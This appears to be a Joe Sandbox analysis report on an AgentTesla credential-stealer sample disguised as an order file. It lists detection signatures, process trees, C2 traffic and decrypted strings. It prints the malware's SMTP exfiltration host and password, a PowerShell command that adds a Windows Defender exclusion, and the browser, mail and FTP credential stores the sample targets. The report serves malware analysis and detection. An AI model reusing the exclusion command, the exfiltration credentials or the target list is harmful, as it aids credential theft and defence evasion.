Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
order2024-10-07_174915.exe

Overview

General Information

Sample name:order2024-10-07_174915.exe
Analysis ID:1528372
MD5:4351cdd212b361f999d8bfad8fceceee
SHA1:34dc372ecb6165c1016b502c93657db789d31203
SHA256:963574e90ebf7786aaf6a17966441068baeadbce658ddd2f19af9a9f3f34c7cc
Tags:agentteslaexeuser-malwarelabnet
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • order2024-10-07_174915.exe (PID: 1448 cmdline: "C:\Users\user\Desktop\order2024-10-07_174915.exe" MD5: 4351CDD212B361F999D8BFAD8FCECEEE)
    • powershell.exe (PID: 7076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7416 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • order2024-10-07_174915.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\order2024-10-07_174915.exe" MD5: 4351CDD212B361F999D8BFAD8FCECEEE)
    • order2024-10-07_174915.exe (PID: 4472 cmdline: "C:\Users\user\Desktop\order2024-10-07_174915.exe" MD5: 4351CDD212B361F999D8BFAD8FCECEEE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1282489119.000000000450D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
    00000008.00000002.2501932436.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000008.00000002.2504284574.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.1282489119.00000000042E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000008.00000002.2504284574.0000000002E21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.order2024-10-07_174915.exe.450d9e0.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              8.2.order2024-10-07_174915.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.order2024-10-07_174915.exe.4536a00.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.order2024-10-07_174915.exe.450d9e0.3.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\order2024-10-07_174915.exe", ParentImage: C:\Users\user\Desktop\order2024-10-07_174915.exe, ParentProcessId: 1448, ParentProcessName: order2024-10-07_174915.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", ProcessId: 7076, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\order2024-10-07_174915.exe", ParentImage: C:\Users\user\Desktop\order2024-10-07_174915.exe, ParentProcessId: 1448, ParentProcessName: order2024-10-07_174915.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", ProcessId: 7076, ProcessName: powershell.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\order2024-10-07_174915.exe, Initiated: true, ProcessId: 4472, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49704
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\order2024-10-07_174915.exe", ParentImage: C:\Users\user\Desktop\order2024-10-07_174915.exe, ParentProcessId: 1448, ParentProcessName: order2024-10-07_174915.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", ProcessId: 7076, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-07T21:19:52.382003+020020301711A Network Trojan was detected192.168.2.749704199.79.62.115587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-07T21:19:52.382003+020028397231Malware Command and Control Activity Detected192.168.2.749704199.79.62.115587TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                      Multi AV Scanner detection for submitted file
                      Source: order2024-10-07_174915.exeReversingLabs: Detection: 52%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: order2024-10-07_174915.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: /log.tmp
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>[
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ]<br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Time:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>User Name:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>Computer Name:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>OSFullName:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>CPU:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>RAM:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IP Address:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <hr>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: New
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IP Address:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: mail.mbarieservicesltd.com
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: saless@mbarieservicesltd.com
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: *o9H+18Q4%;M
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: iinfo@mbarieservicesltd.com
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: appdata
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: KTvkzEc
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: KTvkzEc.exe
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: KTvkzEc
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Type
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <hr>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <b>[
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ]</b> (
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: )<br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {BACK}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {ALT+TAB}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {ALT+F4}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {TAB}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {ESC}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {Win}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {CAPSLOCK}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {KEYUP}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {KEYDOWN}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {KEYLEFT}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {KEYRIGHT}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {DEL}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {END}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {HOME}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {Insert}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {NumLock}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {PageDown}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {PageUp}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {ENTER}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F1}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F2}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F3}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F4}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F5}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F6}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F7}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F8}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F9}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F10}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F11}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F12}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: control
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {CTRL}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: &amp;
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: &lt;
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: &gt;
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: &quot;
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br><hr>Copied Text: <br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <hr>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: logins
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IE/Edge
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Secure Note
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Web Password Credential
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Credential Picker Protector
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Web Credentials
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Credentials
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Domain Certificate Credential
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Domain Password Credential
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Extended Credential
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SchemaId
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pResourceElement
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pIdentityElement
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pPackageSid
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pAuthenticatorElement
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IE/Edge
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UC Browser
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UCBrowser\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Login Data
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: journal
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: wow_logins
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Safari for Windows
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <array>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <dict>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <string>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </string>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <string>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </string>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <data>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </data>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: -convert xml1 -s -o "
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \fixed_keychain.xml"
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Microsoft\Protect\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: credential
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: QQ Browser
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Tencent\QQBrowser\User Data
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Default\EncryptedStorage
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Profile
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \EncryptedStorage
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: entries
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: category
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: str3
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: str2
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: blob0
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: password_value
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IncrediMail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PopPassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SmtpPassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\IncrediMail\Identities\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Accounts_New
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PopPassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SmtpPassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SmtpServer
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: EmailAddress
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Eudora
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: current
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Settings
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SavePasswordText
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Settings
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ReturnAddress
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Falkon Browser
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \falkon\profiles\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: profiles.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: profiles.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \browsedata.db
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: autofill
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ClawsMail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Claws-mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \clawsrc
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \clawsrc
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: passkey0
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: master_passphrase_salt=(.+)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \accountrc
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: smtp_server
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: address
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: account
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \passwordstorerc
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {(.*),(.*)}(.*)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Flock Browser
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Flock\Browser\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: signons3.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: DynDns
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ALLUSERSPROFILE
